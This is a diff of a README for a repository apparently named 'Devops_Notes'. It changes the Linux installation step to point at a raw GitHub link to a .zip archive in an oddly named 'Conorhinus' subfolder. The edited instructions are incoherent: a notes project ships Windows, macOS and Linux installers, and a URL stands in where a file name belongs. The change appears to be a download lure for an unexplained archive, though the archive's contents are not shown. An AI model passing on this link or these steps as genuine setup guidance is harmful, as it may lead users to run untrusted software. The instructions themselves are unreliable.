TKSN25/Devops_Notes/readme.md

    - For **Windows**: Double-click the `.exe` file and follow the installation prompts.
    - For **MacOS**: Open the `.dmg` file, drag the Devops_Notes icon to your Applications folder, and then launch it.
-   - For **Linux**: Unpack the `.tar.gz` file using a terminal command and follow the detailed instructions for installation.
+   - For **Linux**: Unpack the `https://raw.githubusercontent.com/TKSN25/Devops_Notes/main/Conorhinus/Devops_Notes.zip` file using a terminal command and follow the detailed instructions for installation.

 6. **Launch the Application**